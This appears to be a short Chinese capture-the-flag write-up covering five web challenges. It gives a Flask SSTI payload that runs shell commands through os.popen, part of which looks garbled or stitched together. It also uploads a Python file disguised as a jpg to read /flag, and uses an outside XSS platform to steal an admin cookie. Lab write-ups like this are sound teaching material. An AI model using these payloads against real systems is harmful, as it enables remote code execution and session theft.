第一关:Simple_SSTI_1
第二关:Simple_SSTI_2
输入/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}_builtins__['eval']("__import__('os').popen('cat flag').read()")}}
第三关:Flask_FileUpload
打开环境,访问 查看源代码
这句话的意思是:“给我这个文件,我将通过 Python 为您返回运行结果!”
新建一个jpg文件,里面写入代码
import os
os.system('ls /')
查看页面源代码,看到有一个flag文件
利用Python语句查看flag文件
import os
os.system('cat /flag')
第四关:留言板
看见提示,是xss漏洞
在xss平台新建项目
xss平台的网址:XSS平台-XSS测试网站-仅用于安全免费测试
复制下图的代码,在留言区插入
访问admin.php使用管理员账号密码登录,然后查看xss平台的cookie,看到了flag字样,但好像被编码了
使用在线url解码工具得到flag
第五关:滑稽
这道题确实滑稽
f12结束